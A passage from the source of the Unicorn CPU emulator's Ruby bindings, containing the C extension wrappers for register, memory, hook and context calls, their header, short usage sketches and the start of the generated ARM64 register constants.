m_uc_reg_read, 1); rb_define_method(UcClass, "reg_write", m_uc_reg_write, 2); rb_define_method(UcClass, "mem_read", m_uc_mem_read, 2); rb_define_method(UcClass, "mem_write", m_uc_mem_write, 2); rb_define_method(UcClass, "mem_map", m_uc_mem_map, -1); rb_define_method(UcClass, "mem_unmap", m_uc_mem_unmap, 2); rb_define_method(UcClass, "mem_protect", m_uc_mem_protect, 3); rb_define_method(UcClass, "hook_add", m_uc_hook_add, -1); rb_define_method(UcClass, "hook_del", m_uc_hook_del, 1); rb_define_method(UcClass, "query", m_uc_query, 1); rb_define_method(UcClass, "context_save", m_uc_context_save, 0); rb_define_method(UcClass, "context_update", m_uc_context_update, 1); rb_define_method(UcClass, "context_restore", m_uc_context_restore, 1); } VALUE m_uc_initialize(VALUE self, VALUE arch, VALUE mode) { uc_engine *_uc; uc_err err; err = uc_open(NUM2INT(arch), NUM2INT(mode), &_uc); if (err != UC_ERR_OK) { rb_raise(UcError, "%s", uc_strerror(err)); } VALUE uc = Data_Wrap_Struct(UcClass, 0, uc_close, _uc); rb_iv_set(self, "@uch", uc); rb_iv_set(self, "@hooks", rb_ary_new()); return self; } VALUE m_uc_emu_start(int argc, VALUE* argv, VALUE self){ VALUE begin; VALUE until; 
VALUE m_uc_emu_start(int argc, VALUE *argv, VALUE self)
{
    VALUE begin;
    VALUE until;
    VALUE timeout;
    VALUE count;
    uc_err err;
    uc_engine *_uc;
    Data_Get_Struct(rb_iv_get(self, "@uch"), uc_engine, _uc);

    rb_scan_args(argc, argv, "22", &begin, &until, &timeout, &count);
    if (NIL_P(timeout))
        timeout = INT2NUM(0);
    if (NIL_P(count))
        count = INT2NUM(0);

    err = uc_emu_start(_uc, NUM2ULL(begin), NUM2ULL(until), NUM2INT(timeout), NUM2INT(count));
    if (err != UC_ERR_OK) {
        rb_raise(UcError, "%s", uc_strerror(err));
    }
    return Qnil;
}

VALUE m_uc_emu_stop(VALUE self)
{
    uc_err err;
    uc_engine *_uc;
    Data_Get_Struct(rb_iv_get(self, "@uch"), uc_engine, _uc);

    err = uc_emu_stop(_uc);
    if (err != UC_ERR_OK) {
        rb_raise(UcError, "%s", uc_strerror(err));
    }
    return Qnil;
}

VALUE m_uc_reg_read(VALUE self, VALUE reg_id)
{
    uc_err err;
    int32_t tmp_reg = NUM2INT(reg_id);
    int64_t reg_value = 0;
    VALUE to_ret;
    uc_x86_mmr mmr;
    uc_x86_float80 float80;
    uc_engine *_uc;
    Data_Get_Struct(rb_iv_get(self, "@uch"), uc_engine, _uc);

    uc_arch arch;
    uc_query(_uc, UC_QUERY_ARCH, &arch);

    if (arch == UC_ARCH_X86) {
        switch (tmp_reg) {
        case UC_X86_REG_GDTR:
        case UC_X86_REG_IDTR:
        case UC_X86_REG_LDTR:
        case UC_X86_REG_TR:
            mmr.selector = 0;
            mmr.base = 0;
            mmr.limit = 0;
            mmr.flags = 0;
            err = uc_reg_read(_uc, tmp_reg, &mmr);
            if (err != UC_ERR_OK) {
                rb_raise(UcError, "%s", uc_strerror(err));
            }
            VALUE mmr_ary = rb_ary_new();
            reg_value = mmr.selector;
            rb_ary_store(mmr_ary, 0, UINT2NUM(reg_value));
            rb_ary_store(mmr_ary, 1, ULL2NUM(mmr.base));
            rb_ary_store(mmr_ary, 2, UINT2NUM(mmr.limit));
            rb_ary_store(mmr_ary, 3, UINT2NUM(mmr.flags));
            return mmr_ary;
        case UC_X86_REG_FP0:
        case UC_X86_REG_FP1:
        case UC_X86_REG_FP2:
        case UC_X86_REG_FP3:
        case UC_X86_REG_FP4:
        case UC_X86_REG_FP5:
        case UC_X86_REG_FP6:
        case UC_X86_REG_FP7:
            float80.mantissa = 0;
            float80.exponent = 0;
            err = uc_reg_read(_uc, tmp_reg, &float80);
            if (err != UC_ERR_OK) {
                rb_raise(UcError, "%s", uc_strerror(err));
            }
            VALUE float80_ary = rb_ary_new();
            rb_ary_store(float80_ary, 0, ULL2NUM(float80.mantissa));
            rb_ary_store(float80_ary, 1, UINT2NUM(float80.exponent));
            return float80_ary;
        }
    }

    if (arch == UC_ARCH_ARM64) {
        // V & Q registers are the same
        if (tmp_reg >= UC_ARM64_REG_V0 && tmp_reg <= UC_ARM64_REG_V31) {
            tmp_reg += UC_ARM64_REG_Q0 - UC_ARM64_REG_V0;
        }
        if (tmp_reg >= UC_ARM64_REG_Q0 && tmp_reg <= UC_ARM64_REG_Q31) {
            uint64_t neon128_value[2];
            err = uc_reg_read(_uc, tmp_reg, &neon128_value);
            if (err != UC_ERR_OK) {
                rb_raise(UcError, "%s", uc_strerror(err));
            }
            VALUE float128_ary = rb_ary_new();
            rb_ary_store(float128_ary, 0, ULL2NUM(neon128_value[0]));
            rb_ary_store(float128_ary, 1, ULL2NUM(neon128_value[1]));
            return float128_ary;
        }
    }

    err = uc_reg_read(_uc, tmp_reg, &reg_value);
    if (err != UC_ERR_OK) {
        rb_raise(UcError, "%s", uc_strerror(err));
    }
    return ULL2NUM(reg_value);
}
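/*
 * reg_read above returns composite registers as Ruby arrays, and reg_write
 * below expects the same shapes:
 *
 *     x86 GDTR/IDTR/LDTR/TR  ->  [selector, base, limit, flags]
 *     x86 FP0..FP7           ->  [mantissa, exponent]
 *     ARM64 V0..V31/Q0..Q31  ->  [low 64 bits, high 64 bits]
 *
 * e.g. (a sketch): uc.reg_write(UC_X86_REG_GDTR, [0, 0x1000, 0xfff, 0])
 */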
VALUE m_uc_reg_write(VALUE self, VALUE reg_id, VALUE reg_value)
{
    uc_err err;
    int32_t tmp_reg = NUM2INT(reg_id);
    uc_x86_mmr mmr;
    uc_x86_float80 float80;
    int64_t tmp;
    uc_engine *_uc;
    Data_Get_Struct(rb_iv_get(self, "@uch"), uc_engine, _uc);

    uc_arch arch;
    uc_query(_uc, UC_QUERY_ARCH, &arch);

    if (arch == UC_ARCH_X86) {
        switch (tmp_reg) {
        case UC_X86_REG_GDTR:
        case UC_X86_REG_IDTR:
        case UC_X86_REG_LDTR:
        case UC_X86_REG_TR:
            Check_Type(reg_value, T_ARRAY);
            mmr.selector = NUM2USHORT(rb_ary_entry(reg_value, 0));
            mmr.base = NUM2ULL(rb_ary_entry(reg_value, 1));
            mmr.limit = NUM2UINT(rb_ary_entry(reg_value, 2));
            mmr.flags = NUM2UINT(rb_ary_entry(reg_value, 3));
            err = uc_reg_write(_uc, tmp_reg, &mmr);
            if (err != UC_ERR_OK) {
                rb_raise(UcError, "%s", uc_strerror(err));
            }
            return Qnil;
        case UC_X86_REG_FP0:
        case UC_X86_REG_FP1:
        case UC_X86_REG_FP2:
        case UC_X86_REG_FP3:
        case UC_X86_REG_FP4:
        case UC_X86_REG_FP5:
        case UC_X86_REG_FP6:
        case UC_X86_REG_FP7:
            Check_Type(reg_value, T_ARRAY);
            float80.mantissa = NUM2ULL(rb_ary_entry(reg_value, 0));
            float80.exponent = NUM2USHORT(rb_ary_entry(reg_value, 1));
            err = uc_reg_write(_uc, tmp_reg, &float80);
            if (err != UC_ERR_OK) {
                rb_raise(UcError, "%s", uc_strerror(err));
            }
            return Qnil;
        }
    }

    if (arch == UC_ARCH_ARM64) {
        // V & Q registers are the same
        if (tmp_reg >= UC_ARM64_REG_V0 && tmp_reg <= UC_ARM64_REG_V31) {
            tmp_reg += UC_ARM64_REG_Q0 - UC_ARM64_REG_V0;
        }
        if (tmp_reg >= UC_ARM64_REG_Q0 && tmp_reg <= UC_ARM64_REG_Q31) {
            Check_Type(reg_value, T_ARRAY);
            uint64_t neon128_value[2];
            neon128_value[0] = NUM2ULL(rb_ary_entry(reg_value, 0));
            neon128_value[1] = NUM2ULL(rb_ary_entry(reg_value, 1));
            // use the remapped id so writes to V registers reach the Q alias
            err = uc_reg_write(_uc, tmp_reg, &neon128_value);
            if (err != UC_ERR_OK) {
                rb_raise(UcError, "%s", uc_strerror(err));
            }
            return Qnil;
        }
    }

    tmp = NUM2ULL(reg_value);
    err = uc_reg_write(_uc, tmp_reg, &tmp);
    if (err != UC_ERR_OK) {
        rb_raise(UcError, "%s", uc_strerror(err));
    }
    return Qnil;
}

VALUE m_uc_mem_read(VALUE self, VALUE address, VALUE size)
{
    size_t isize = NUM2UINT(size);
    uint8_t bytes[isize];
    uc_err err;
    uc_engine *_uc;
    Data_Get_Struct(rb_iv_get(self, "@uch"), uc_engine, _uc);

    err = uc_mem_read(_uc, NUM2ULL(address), bytes, isize);
    if (err != UC_ERR_OK) {
        rb_raise(UcError, "%s", uc_strerror(err));
    }
    return rb_str_new((const char *)bytes, isize);
}

VALUE m_uc_mem_write(VALUE self, VALUE address, VALUE bytes)
{
    uc_err err;
    uc_engine *_uc;
    Data_Get_Struct(rb_iv_get(self, "@uch"), uc_engine, _uc);

    err = uc_mem_write(_uc, NUM2ULL(address), StringValuePtr(bytes), RSTRING_LEN(bytes));
    if (err != UC_ERR_OK) {
        rb_raise(UcError, "%s", uc_strerror(err));
    }
    return Qnil;
}

VALUE m_uc_mem_map(int argc, VALUE *argv, VALUE self)
{
    uc_err err;
    VALUE address;
    VALUE size;
    VALUE perms;
    uc_engine *_uc;
    Data_Get_Struct(rb_iv_get(self, "@uch"), uc_engine, _uc);

    rb_scan_args(argc, argv, "21", &address, &size, &perms);
    if (NIL_P(perms))
        perms = INT2NUM(UC_PROT_ALL);

    err = uc_mem_map(_uc, NUM2ULL(address), NUM2UINT(size), NUM2UINT(perms));
    if (err != UC_ERR_OK) {
        rb_raise(UcError, "%s", uc_strerror(err));
    }
    return Qnil;
}

VALUE m_uc_mem_unmap(VALUE self, VALUE address, VALUE size)
{
    uc_err err;
    uc_engine *_uc;
    Data_Get_Struct(rb_iv_get(self, "@uch"), uc_engine, _uc);

    err = uc_mem_unmap(_uc, NUM2ULL(address), NUM2UINT(size));
    if (err != UC_ERR_OK) {
        rb_raise(UcError, "%s", uc_strerror(err));
    }
    return Qnil;
}

VALUE m_uc_mem_protect(VALUE self, VALUE address, VALUE size, VALUE perms)
{
    uc_err err;
    uc_engine *_uc;
    Data_Get_Struct(rb_iv_get(self, "@uch"), uc_engine, _uc);

    err = uc_mem_protect(_uc, NUM2ULL(address), NUM2UINT(size), NUM2UINT(perms));
    if (err != UC_ERR_OK) {
        rb_raise(UcError, "%s", uc_strerror(err));
    }
    return Qnil;
}
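/*
 * Memory API sketch from Ruby (the perms argument to mem_map defaults to
 * UC_PROT_ALL above; the UC_PROT_* constants come from the generated
 * unicorn_const file):
 *
 *     uc.mem_map(0x1000, 0x1000)              # map 4 KiB, RWX
 *     uc.mem_write(0x1000, "\x90\x90")        # two x86 NOPs
 *     uc.mem_read(0x1000, 2)                  # => "\x90\x90"
 *     uc.mem_protect(0x1000, 0x1000, UC_PROT_READ | UC_PROT_EXEC)
 */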
static void cb_hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data)
{
    struct hook *hook = (struct hook *)user_data;
    VALUE cb = hook->cb;
    VALUE ud = hook->ud;
    VALUE rUc = hook->rUc;
    rb_funcall(cb, rb_intern("call"), 4, rUc, ULL2NUM(address), UINT2NUM(size), ud);
}

static void cb_hook_mem_access(uc_engine *uc, uint32_t access, uint64_t address, uint32_t size, int64_t value, void *user_data)
{
    struct hook *hook = (struct hook *)user_data;
    VALUE cb = hook->cb;
    VALUE ud = hook->ud;
    VALUE rUc = hook->rUc;
    rb_funcall(cb, rb_intern("call"), 6, rUc, UINT2NUM(access), ULL2NUM(address), UINT2NUM(size), LL2NUM(value), ud);
}

static bool cb_hook_mem_invalid(uc_engine *uc, uint32_t access, uint64_t address, uint32_t size, int64_t value, void *user_data)
{
    struct hook *hook = (struct hook *)user_data;
    VALUE cb = hook->cb;
    VALUE ud = hook->ud;
    VALUE rUc = hook->rUc;
    return RTEST(rb_funcall(cb, rb_intern("call"), 6, rUc, UINT2NUM(access), ULL2NUM(address), UINT2NUM(size), LL2NUM(value), ud));
}

static uint32_t cb_hook_insn_in(uc_engine *uc, uint32_t port, int size, void *user_data)
{
    struct hook *hook = (struct hook *)user_data;
    VALUE cb = hook->cb;
    VALUE ud = hook->ud;
    VALUE rUc = hook->rUc;
    return NUM2UINT(rb_funcall(cb, rb_intern("call"), 4, rUc, UINT2NUM(port), INT2NUM(size), ud));
}

static void cb_hook_insn_out(uc_engine *uc, uint32_t port, int size, uint32_t value, void *user_data)
{
    struct hook *hook = (struct hook *)user_data;
    VALUE cb = hook->cb;
    VALUE ud = hook->ud;
    VALUE rUc = hook->rUc;
    rb_funcall(cb, rb_intern("call"), 5, rUc, UINT2NUM(port), INT2NUM(size), UINT2NUM(value), ud);
}

static void cb_hook_insn_syscall(uc_engine *uc, void *user_data)
{
    struct hook *hook = (struct hook *)user_data;
    VALUE cb = hook->cb;
    VALUE ud = hook->ud;
    VALUE rUc = hook->rUc;
    rb_funcall(cb, rb_intern("call"), 2, rUc, ud);
}

static void cb_hook_intr(uc_engine *uc, uint32_t intno, void *user_data)
{
    struct hook *hook = (struct hook *)user_data;
    VALUE cb = hook->cb;
    VALUE ud = hook->ud;
    VALUE rUc = hook->rUc;
    rb_funcall(cb, rb_intern("call"), 3, rUc, ULL2NUM(intno), ud);
}

static void mark_hook(void *p)
{
    struct hook *hook = (struct hook *)p;
    rb_gc_mark(hook->cb);
    rb_gc_mark(hook->ud);
    rb_gc_mark(hook->rUc); // just for completeness sake even though this should already be marked
}

VALUE m_uc_hook_add(int argc, VALUE *argv, VALUE self)
{
    VALUE hook_type;
    VALUE callback;
    VALUE user_data;
    VALUE begin;
    VALUE end;
    VALUE arg1;
    uc_engine *_uc;
    Data_Get_Struct(rb_iv_get(self, "@uch"), uc_engine, _uc);

    rb_scan_args(argc, argv, "24", &hook_type, &callback, &user_data, &begin, &end, &arg1);
    if (NIL_P(begin))
        begin = ULL2NUM(1);
    if (NIL_P(end))
        end = ULL2NUM(0);
    if (NIL_P(arg1))
        arg1 = INT2NUM(0);

    uc_err err = UC_ERR_OK;
    if (rb_class_of(callback) != rb_cProc)
        rb_raise(UcError, "Expected Proc callback");

    struct hook *hook = (struct hook *)malloc(sizeof(struct hook));
    hook->cb = callback;
    hook->ud = user_data;
    hook->rUc = self;

    VALUE r_hook;
    VALUE hooks_list;
    r_hook = Data_Wrap_Struct(Hook, mark_hook, free, hook);
    hooks_list = rb_iv_get(self, "@hooks");
    rb_ary_push(hooks_list, r_hook);

    uint32_t htype = NUM2UINT(hook_type);
    if (htype == UC_HOOK_INSN) {
        switch (NUM2INT(arg1)) {
        case UC_X86_INS_IN:
            err = uc_hook_add(_uc, &hook->trace, htype, cb_hook_insn_in, (void *)hook, NUM2ULL(begin), NUM2ULL(end), NUM2INT(arg1));
            break;
        case UC_X86_INS_OUT:
            err = uc_hook_add(_uc, &hook->trace, htype, cb_hook_insn_out, (void *)hook, NUM2ULL(begin), NUM2ULL(end), NUM2INT(arg1));
            break;
        case UC_X86_INS_SYSCALL:
        case UC_X86_INS_SYSENTER:
            err = uc_hook_add(_uc, &hook->trace, htype, cb_hook_insn_syscall, (void *)hook, NUM2ULL(begin), NUM2ULL(end), NUM2INT(arg1));
            break;
        default:
            // reject instruction hooks this binding has no adapter for,
            // instead of leaving err unset
            err = UC_ERR_ARG;
            break;
        }
    } else if (htype == UC_HOOK_INTR) {
        err = uc_hook_add(_uc, &hook->trace, htype, cb_hook_intr, (void *)hook, NUM2ULL(begin), NUM2ULL(end));
    } else if (htype == UC_HOOK_CODE || htype == UC_HOOK_BLOCK) {
        err = uc_hook_add(_uc, &hook->trace, htype, cb_hook_code, (void *)hook, NUM2ULL(begin), NUM2ULL(end));
    } else if (htype & UC_HOOK_MEM_READ_UNMAPPED || htype & UC_HOOK_MEM_WRITE_UNMAPPED ||
               htype & UC_HOOK_MEM_FETCH_UNMAPPED || htype & UC_HOOK_MEM_READ_PROT ||
               htype & UC_HOOK_MEM_WRITE_PROT || htype & UC_HOOK_MEM_FETCH_PROT ||
               htype & UC_HOOK_MEM_READ_INVALID || htype & UC_HOOK_MEM_WRITE_INVALID ||
               htype & UC_HOOK_MEM_FETCH_INVALID || htype & UC_HOOK_MEM_UNMAPPED ||
               htype & UC_HOOK_MEM_PROT || htype & UC_HOOK_MEM_INVALID) {
        err = uc_hook_add(_uc, &hook->trace, htype, cb_hook_mem_invalid, (void *)hook, NUM2ULL(begin), NUM2ULL(end));
    } else {
        err = uc_hook_add(_uc, &hook->trace, htype, cb_hook_mem_access, (void *)hook, NUM2ULL(begin), NUM2ULL(end));
    }

    if (err != UC_ERR_OK) {
        rb_raise(UcError, "%s", uc_strerror(err));
    }
    return r_hook;
}
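/*
 * hook_add sketch from Ruby; the callback arity must match the adapter
 * selected above (cb_hook_code for UC_HOOK_CODE takes uc, address, size, ud),
 * and hook_add returns the Hook wrapper accepted by hook_del below:
 *
 *     h = uc.hook_add(UC_HOOK_CODE, proc { |uc, address, size, ud|
 *       printf("tracing 0x%x, %d bytes\n", address, size)
 *     })
 *     uc.hook_del(h)
 */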
VALUE m_uc_hook_del(VALUE self, VALUE hook)
{
    uc_err err;
    uc_engine *_uc;
    Data_Get_Struct(rb_iv_get(self, "@uch"), uc_engine, _uc);

    struct hook *h;
    Data_Get_Struct(hook, struct hook, h);
    err = uc_hook_del(_uc, h->trace);
    rb_ary_delete(rb_iv_get(self, "@hooks"), hook);
    if (err != UC_ERR_OK) {
        rb_raise(UcError, "%s", uc_strerror(err));
    }
    return Qnil;
}

VALUE m_uc_query(VALUE self, VALUE query_mode)
{
    int qm = NUM2INT(query_mode);
    size_t result;
    uc_err err;
    uc_engine *_uc;
    Data_Get_Struct(rb_iv_get(self, "@uch"), uc_engine, _uc);

    err = uc_query(_uc, qm, &result);
    if (err != UC_ERR_OK) {
        rb_raise(UcError, "%s", uc_strerror(err));
    }
    return INT2NUM(result);
}

VALUE m_uc_context_save(VALUE self)
{
    uc_err err;
    uc_engine *_uc;
    Data_Get_Struct(rb_iv_get(self, "@uch"), uc_engine, _uc);

    uc_context *_context;
    err = uc_context_alloc(_uc, &_context);
    if (err != UC_ERR_OK) {
        rb_raise(UcError, "%s", uc_strerror(err));
    }

    err = uc_context_save(_uc, _context);
    if (err != UC_ERR_OK) {
        rb_raise(UcError, "%s", uc_strerror(err));
    }

    VALUE sc = Data_Wrap_Struct(SavedContext, 0, uc_free, _context);
    return sc;
}

VALUE m_uc_context_update(VALUE self, VALUE context)
{
    uc_err err;
    uc_engine *_uc;
    Data_Get_Struct(rb_iv_get(self, "@uch"), uc_engine, _uc);

    uc_context *_context;
    Data_Get_Struct(context, uc_context, _context);
    err = uc_context_save(_uc, _context);
    if (err != UC_ERR_OK) {
        rb_raise(UcError, "%s", uc_strerror(err));
    }
    return Qnil;
}

VALUE m_uc_context_restore(VALUE self, VALUE context)
{
    uc_err err;
    uc_engine *_uc;
    Data_Get_Struct(rb_iv_get(self, "@uch"), uc_engine, _uc);

    uc_context *_context;
    Data_Get_Struct(context, uc_context, _context);
    err = uc_context_restore(_uc, _context);
    if (err != UC_ERR_OK) {
        rb_raise(UcError, "%s", uc_strerror(err));
    }
    return Qnil;
}
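Taken together, the binding supports the usual Unicorn workflow. A minimal end-to-end sketch (assumptions: the extension is installed as unicorn_engine, and UC_ARCH_X86, UC_MODE_32 and the UC_X86_REG_* constants come from generated const files alongside the ones reproduced below):

    require 'unicorn_engine'
    require 'unicorn_engine/unicorn_const'
    require 'unicorn_engine/x86_const'
    include UnicornEngine

    X86_CODE32 = "\x41\x4a"   # INC ecx; DEC edx
    ADDRESS = 0x1000000

    uc = Uc.new(UC_ARCH_X86, UC_MODE_32)
    uc.mem_map(ADDRESS, 2 * 1024 * 1024)
    uc.mem_write(ADDRESS, X86_CODE32)
    uc.reg_write(UC_X86_REG_ECX, 0x1234)
    uc.reg_write(UC_X86_REG_EDX, 0x7890)
    uc.emu_start(ADDRESS, ADDRESS + X86_CODE32.bytesize)
    printf("ECX = 0x%x\n", uc.reg_read(UC_X86_REG_ECX))   # => 0x1235
    printf("EDX = 0x%x\n", uc.reg_read(UC_X86_REG_EDX))   # => 0x788f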
==> unicorn-2.1.1/bindings/ruby/unicorn_gem/ext/unicorn.h <==
/*
Ruby bindings for the Unicorn Emulator Engine

Copyright(c) 2016 Sascha Schirra

This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License version 2 as
published by the Free Software Foundation.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
*/
VALUE m_uc_initialize(VALUE self, VALUE arch, VALUE mode);
VALUE m_uc_emu_start(int argc, VALUE *argv, VALUE self);
VALUE m_uc_emu_stop(VALUE self);
VALUE m_uc_reg_read(VALUE self, VALUE reg_id);
VALUE m_uc_reg_write(VALUE self, VALUE reg_id, VALUE reg_value);
VALUE m_uc_mem_read(VALUE self, VALUE address, VALUE size);
VALUE m_uc_mem_write(VALUE self, VALUE address, VALUE bytes);
VALUE m_uc_mem_map(int argc, VALUE *argv, VALUE self);
VALUE m_uc_mem_unmap(VALUE self, VALUE address, VALUE size);
VALUE m_uc_mem_protect(VALUE self, VALUE address, VALUE size, VALUE perms);
VALUE m_uc_hook_add(int argc, VALUE *argv, VALUE self);
VALUE m_uc_hook_del(VALUE self, VALUE hook);
VALUE m_uc_query(VALUE self, VALUE query_mode);
VALUE m_uc_context_save(VALUE self);
VALUE m_uc_context_update(VALUE self, VALUE context);
VALUE m_uc_context_restore(VALUE self, VALUE context);
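The context_* methods wrap uc_context_alloc/save/restore, so CPU state can be snapshotted around a run (a sketch, continuing the x86 example above):

    ctx = uc.context_save                                 # => UnicornEngine::SavedContext
    uc.emu_start(ADDRESS, ADDRESS + X86_CODE32.bytesize)
    uc.context_restore(ctx)                               # roll registers back to the snapshot
    uc.context_update(ctx)                                # re-save the current state into ctx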
==> unicorn-2.1.1/bindings/ruby/unicorn_gem/lib/unicorn_engine/arm64_const.rb <==
# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [arm64_const.rb]

module UnicornEngine

# ARM64 CPU
UC_CPU_ARM64_A57 = 0; UC_CPU_ARM64_A53 = 1; UC_CPU_ARM64_A72 = 2; UC_CPU_ARM64_MAX = 3; UC_CPU_ARM64_ENDING = 4

# ARM64 registers
UC_ARM64_REG_INVALID = 0; UC_ARM64_REG_X29 = 1; UC_ARM64_REG_X30 = 2; UC_ARM64_REG_NZCV = 3
UC_ARM64_REG_SP = 4; UC_ARM64_REG_WSP = 5; UC_ARM64_REG_WZR = 6; UC_ARM64_REG_XZR = 7
UC_ARM64_REG_B0 = 8; UC_ARM64_REG_B1 = 9; UC_ARM64_REG_B2 = 10; UC_ARM64_REG_B3 = 11; UC_ARM64_REG_B4 = 12; UC_ARM64_REG_B5 = 13; UC_ARM64_REG_B6 = 14; UC_ARM64_REG_B7 = 15
UC_ARM64_REG_B8 = 16; UC_ARM64_REG_B9 = 17; UC_ARM64_REG_B10 = 18; UC_ARM64_REG_B11 = 19; UC_ARM64_REG_B12 = 20; UC_ARM64_REG_B13 = 21; UC_ARM64_REG_B14 = 22; UC_ARM64_REG_B15 = 23
UC_ARM64_REG_B16 = 24; UC_ARM64_REG_B17 = 25; UC_ARM64_REG_B18 = 26; UC_ARM64_REG_B19 = 27; UC_ARM64_REG_B20 = 28; UC_ARM64_REG_B21 = 29; UC_ARM64_REG_B22 = 30; UC_ARM64_REG_B23 = 31
UC_ARM64_REG_B24 = 32; UC_ARM64_REG_B25 = 33; UC_ARM64_REG_B26 = 34; UC_ARM64_REG_B27 = 35; UC_ARM64_REG_B28 = 36; UC_ARM64_REG_B29 = 37; UC_ARM64_REG_B30 = 38; UC_ARM64_REG_B31 = 39
UC_ARM64_REG_D0 = 40; UC_ARM64_REG_D1 = 41; UC_ARM64_REG_D2 = 42; UC_ARM64_REG_D3 = 43; UC_ARM64_REG_D4 = 44; UC_ARM64_REG_D5 = 45; UC_ARM64_REG_D6 = 46; UC_ARM64_REG_D7 = 47
UC_ARM64_REG_D8 = 48; UC_ARM64_REG_D9 = 49; UC_ARM64_REG_D10 = 50; UC_ARM64_REG_D11 = 51; UC_ARM64_REG_D12 = 52; UC_ARM64_REG_D13 = 53; UC_ARM64_REG_D14 = 54; UC_ARM64_REG_D15 = 55
UC_ARM64_REG_D16 = 56; UC_ARM64_REG_D17 = 57; UC_ARM64_REG_D18 = 58; UC_ARM64_REG_D19 = 59; UC_ARM64_REG_D20 = 60; UC_ARM64_REG_D21 = 61; UC_ARM64_REG_D22 = 62; UC_ARM64_REG_D23 = 63
UC_ARM64_REG_D24 = 64; UC_ARM64_REG_D25 = 65; UC_ARM64_REG_D26 = 66; UC_ARM64_REG_D27 = 67; UC_ARM64_REG_D28 = 68; UC_ARM64_REG_D29 = 69; UC_ARM64_REG_D30 = 70; UC_ARM64_REG_D31 = 71
UC_ARM64_REG_H0 = 72; UC_ARM64_REG_H1 = 73; UC_ARM64_REG_H2 = 74; UC_ARM64_REG_H3 = 75; UC_ARM64_REG_H4 = 76; UC_ARM64_REG_H5 = 77; UC_ARM64_REG_H6 = 78; UC_ARM64_REG_H7 = 79
UC_ARM64_REG_H8 = 80; UC_ARM64_REG_H9 = 81; UC_ARM64_REG_H10 = 82; UC_ARM64_REG_H11 = 83; UC_ARM64_REG_H12 = 84; UC_ARM64_REG_H13 = 85; UC_ARM64_REG_H14 = 86; UC_ARM64_REG_H15 = 87
UC_ARM64_REG_H16 = 88; UC_ARM64_REG_H17 = 89; UC_ARM64_REG_H18 = 90; UC_ARM64_REG_H19 = 91; UC_ARM64_REG_H20 = 92; UC_ARM64_REG_H21 = 93; UC_ARM64_REG_H22 = 94; UC_ARM64_REG_H23 = 95
UC_ARM64_REG_H24 = 96; UC_ARM64_REG_H25 = 97; UC_ARM64_REG_H26 = 98; UC_ARM64_REG_H27 = 99; UC_ARM64_REG_H28 = 100; UC_ARM64_REG_H29 = 101; UC_ARM64_REG_H30 = 102; UC_ARM64_REG_H31 = 103
UC_ARM64_REG_Q0 = 104; UC_ARM64_REG_Q1 = 105; UC_ARM64_REG_Q2 = 106; UC_ARM64_REG_Q3 = 107; UC_ARM64_REG_Q4 = 108; UC_ARM64_REG_Q5 = 109; UC_ARM64_REG_Q6 = 110; UC_ARM64_REG_Q7 = 111
UC_ARM64_REG_Q8 = 112; UC_ARM64_REG_Q9 = 113; UC_ARM64_REG_Q10 = 114; UC_ARM64_REG_Q11 = 115; UC_ARM64_REG_Q12 = 116; UC_ARM64_REG_Q13 = 117; UC_ARM64_REG_Q14 = 118; UC_ARM64_REG_Q15 = 119
UC_ARM64_REG_Q16 = 120; UC_ARM64_REG_Q17 = 121; UC_ARM64_REG_Q18 = 122; UC_ARM64_REG_Q19 = 123; UC_ARM64_REG_Q20 = 124; UC_ARM64_REG_Q21 = 125; UC_ARM64_REG_Q22 = 126; UC_ARM64_REG_Q23 = 127
UC_ARM64_REG_Q24 = 128; UC_ARM64_REG_Q25 = 129; UC_ARM64_REG_Q26 = 130; UC_ARM64_REG_Q27 = 131; UC_ARM64_REG_Q28 = 132; UC_ARM64_REG_Q29 = 133; UC_ARM64_REG_Q30 = 134; UC_ARM64_REG_Q31 = 135
UC_ARM64_REG_S0 = 136; UC_ARM64_REG_S1 = 137; UC_ARM64_REG_S2 = 138; UC_ARM64_REG_S3 = 139; UC_ARM64_REG_S4 = 140; UC_ARM64_REG_S5 = 141; UC_ARM64_REG_S6 = 142; UC_ARM64_REG_S7 = 143
UC_ARM64_REG_S8 = 144; UC_ARM64_REG_S9 = 145; UC_ARM64_REG_S10 = 146; UC_ARM64_REG_S11 = 147; UC_ARM64_REG_S12 = 148; UC_ARM64_REG_S13 = 149; UC_ARM64_REG_S14 = 150; UC_ARM64_REG_S15 = 151
UC_ARM64_REG_S16 = 152; UC_ARM64_REG_S17 = 153; UC_ARM64_REG_S18 = 154; UC_ARM64_REG_S19 = 155; UC_ARM64_REG_S20 = 156; UC_ARM64_REG_S21 = 157; UC_ARM64_REG_S22 = 158; UC_ARM64_REG_S23 = 159
UC_ARM64_REG_S24 = 160; UC_ARM64_REG_S25 = 161; UC_ARM64_REG_S26 = 162; UC_ARM64_REG_S27 = 163; UC_ARM64_REG_S28 = 164; UC_ARM64_REG_S29 = 165; UC_ARM64_REG_S30 = 166; UC_ARM64_REG_S31 = 167
UC_ARM64_REG_W0 = 168; UC_ARM64_REG_W1 = 169; UC_ARM64_REG_W2 = 170; UC_ARM64_REG_W3 = 171; UC_ARM64_REG_W4 = 172; UC_ARM64_REG_W5 = 173; UC_ARM64_REG_W6 = 174; UC_ARM64_REG_W7 = 175
UC_ARM64_REG_W8 = 176; UC_ARM64_REG_W9 = 177; UC_ARM64_REG_W10 = 178; UC_ARM64_REG_W11 = 179; UC_ARM64_REG_W12 = 180; UC_ARM64_REG_W13 = 181; UC_ARM64_REG_W14 = 182; UC_ARM64_REG_W15 = 183
UC_ARM64_REG_W16 = 184; UC_ARM64_REG_W17 = 185; UC_ARM64_REG_W18 = 186; UC_ARM64_REG_W19 = 187; UC_ARM64_REG_W20 = 188; UC_ARM64_REG_W21 = 189; UC_ARM64_REG_W22 = 190; UC_ARM64_REG_W23 = 191
UC_ARM64_REG_W24 = 192; UC_ARM64_REG_W25 = 193; UC_ARM64_REG_W26 = 194; UC_ARM64_REG_W27 = 195; UC_ARM64_REG_W28 = 196; UC_ARM64_REG_W29 = 197; UC_ARM64_REG_W30 = 198
